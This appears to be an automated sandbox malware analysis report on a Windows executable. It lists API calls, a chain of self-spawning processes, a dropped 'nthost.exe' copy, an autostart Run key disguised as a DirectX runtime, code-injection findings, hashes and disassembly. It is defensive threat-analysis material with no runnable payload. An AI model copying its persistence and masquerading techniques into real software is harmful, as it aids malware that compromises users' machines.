Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: _strlen,ShellExecuteA,ShellAboutW,ExtractIconA,GetColorSpace,GetLogColorSpaceA,ChoosePixelFormat,SetICMMode,GetPrivateProfileSectionNamesA,GetCalendarInfoW,GetLocaleInfoW,GetModuleHandleW,LocalAlloc,VirtualProtect,GetTickCount,2_2_0300966F
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,4_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,4_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,4_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,4_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,4_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,4_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,4_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,6_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,6_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,6_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,6_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,6_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,8_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,8_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,8_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,8_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,8_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,8_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,8_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,10_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,10_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,10_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,10_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,10_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,12_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,12_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,12_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,12_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,12_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,14_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,14_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,14_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,14_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,14_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,16_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,16_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,16_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,16_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,16_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,18_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,18_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,18_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,18_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,18_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,18_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,18_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,20_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,20_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,20_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,GetACP,20_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,20_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,20_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetLocaleInfoA,20_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,22_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,22_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,22_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,GetACP,22_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,22_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,22_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,22_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,24_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,GetACP,24_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,24_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,24_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,24_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,26_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,26_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,26_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,GetACP,26_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,26_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,26_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,26_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,28_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,28_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,28_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,GetACP,28_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,28_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,28_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,28_2_00409DFC
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,30_2_00404FC0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,30_2_004050CC
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,30_2_0040587A
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,GetACP,30_2_0040B2B4
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,30_2_00409DB0
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,30_2_0040587C
Source: C:\Users\user\Desktop\obtG43AWHP.exe Code function: GetLocaleInfoA,30_2_00409DFC

Behavior Graph

[Figure: behavior graph. Behavior Graph ID: 33765, Sample: obtG43AWHP.bin, Startdate: 08/10/2017, Architecture: WINDOWS, Score: 80.]

  • Process chain: obtG43AWHP.exe (node 1) starts obtG43AWHP.exe (node 2), and each instance starts the next up to node 36. Node 36 drops nthost.exe (PE32) and starts nthost.exe (node 37), which starts nthost.exe (node 39). explorer.exe (node 38) is started separately.
  • Signatures on nodes 1 to 36: Contains functionality to inject code into remote processes; Creates autostart registry keys with suspicious names; Injects a PE file into a foreign processes.
  • Signatures on nodes 37 and 39: Injects a PE file into a foreign processes; Antivirus detection for dropped file.

Simulations

Behavior and APIs

Time | Type | Description
19:11:14 | API Interceptor | 1x Sleep call for process: explorer.exe modified from: 60000ms to: 500ms
19:11:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DX9 C++RTL C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe

Antivirus Detection

Initial Sample

Source | Detection | Cloud | Link
obtG43AWH.exe | 46% | virustotal | Browse

Dropped Files

Source | Detection | Cloud | Link
C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe | 46% | virustotal | Browse

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Startup

  • System is w7
  • obtG43AWHP.exe (PID: 3072 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
    • obtG43AWHP.exe (PID: 3120 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
      • obtG43AWHP.exe (PID: 3132 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 0 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
        • obtG43AWHP.exe (PID: 3156 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 0 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
          • obtG43AWHP.exe (PID: 3168 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 1 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
            • obtG43AWHP.exe (PID: 3192 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 1 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
              • obtG43AWHP.exe (PID: 3204 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 2 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                • obtG43AWHP.exe (PID: 3220 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 2 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                  • obtG43AWHP.exe (PID: 3232 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 3 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                    • obtG43AWHP.exe (PID: 3248 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 3 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                      • obtG43AWHP.exe (PID: 3260 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 4 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                        • obtG43AWHP.exe (PID: 3284 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 4 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                          • obtG43AWHP.exe (PID: 3296 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 5 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                            • obtG43AWHP.exe (PID: 3312 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 5 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                              • obtG43AWHP.exe (PID: 3324 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 6 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                • obtG43AWHP.exe (PID: 3340 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 6 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                  • obtG43AWHP.exe (PID: 3352 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 7 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                    • obtG43AWHP.exe (PID: 3368 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 7 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                      • obtG43AWHP.exe (PID: 3380 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 8 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                        • obtG43AWHP.exe (PID: 3412 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 8 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                          • obtG43AWHP.exe (PID: 3424 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 9 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                            • obtG43AWHP.exe (PID: 3440 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 9 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                              • obtG43AWHP.exe (PID: 3452 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 10 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                • obtG43AWHP.exe (PID: 3468 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 10 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                  • obtG43AWHP.exe (PID: 3480 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 11 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                    • obtG43AWHP.exe (PID: 3496 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 11 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                      • obtG43AWHP.exe (PID: 3508 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 12 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                        • obtG43AWHP.exe (PID: 3528 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 12 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                          • obtG43AWHP.exe (PID: 3540 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 13 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                            • obtG43AWHP.exe (PID: 3560 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 13 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                              • obtG43AWHP.exe (PID: 3572 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 14 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                • obtG43AWHP.exe (PID: 3592 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 14 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                  • obtG43AWHP.exe (PID: 3604 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 15 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                    • obtG43AWHP.exe (PID: 3620 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 15 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                      • obtG43AWHP.exe (PID: 3632 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 16 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                        • obtG43AWHP.exe (PID: 3652 cmdline: 'C:\Users\user\Desktop\obtG43AWHP.exe' 16 MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                          • nthost.exe (PID: 3672 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe' MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
                                                                            • nthost.exe (PID: 3696 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe' MD5: 1DE07D0AF66CFA7B504C2F563D45437B)
  • explorer.exe (PID: 3688 cmdline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
MD5:1DE07D0AF66CFA7B504C2F563D45437B
SHA1:B340C407A3D703E412C18DDC7FFDE70B3DF932DF
SHA-256:D819B9EBF5C342289ABC3CE17A365A50C84616C46A01B7A0B90A1C5F41277DE0
SHA-512:85BE784A3F2AA0C8A311493F02859B6E8EF51F6294BFCA83027F1BCDD3EB5A59EC3718B9E8E281BD1C2BDBA36809B4853ADA998B5F37BF88E7DB48FF4A118AFE
Malicious:true
Antivirus:
  • Antivirus: virustotal, Detection: 46%, Browse
C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe:Zone.Identifier
File Type:ASCII text, with CRLF line terminators
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Java Script embedded in Visual Basic Script (1500/0) 0.01%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:obtG43AWH.exe
File size:498176
MD5:1de07d0af66cfa7b504c2f563d45437b
SHA1:b340c407a3d703e412c18ddc7ffde70b3df932df
SHA256:d819b9ebf5c342289abc3ce17a365a50c84616c46a01b7a0b90a1c5f41277de0
SHA512:85be784a3f2aa0c8a311493f02859b6e8ef51f6294bfca83027f1bcdd3eb5a59ec3718b9e8e281bd1c2bdba36809b4853ada998b5f37bf88e7db48ff4a118afe
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...v.j[v.j[v.j[...[`.j[...[x.j[...[..j[...[..j[v.k[ .j[...[w.j[...[w.j[...[w.j[Richv.j[................PE..L....0.Y...........

Static PE Info

General

Entrypoint:0x3002e81
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x3000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x598830C8 [Mon Aug 7 09:20:08 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:5b44ece315e26b140629a3666ae6a98c

Entrypoint Preview

Instruction
call 00007F53A0F54F3Eh
jmp 00007F53A0F52A2Eh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 00007F53A0F55B58h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007F53A0F52BB9h
call 00007F53A0F53B9Fh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007F53A0F52CD4h
test al, 40h
je 00007F53A0F52BAFh
call 00007F53A0F53B84h
mov dword ptr [eax], 00000022h
jmp 00007F53A0F52B85h
push ebx
xor ebx, ebx
test al, 01h
je 00007F53A0F52BB8h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007F53A0F52C2Dh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007F53A0F52BCEh
call 00007F53A0F55935h
add eax, 20h
cmp esi, eax
je 00007F53A0F52BAEh
call 00007F53A0F55929h
add eax, 40h
cmp esi, eax
jne 00007F53A0F52BAFh
push dword ptr [ebp+0Ch]
call 00007F53A0F558C4h
pop ecx
test eax, eax
jne 00007F53A0F52BA9h
push esi
call 00007F53A0F55870h
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
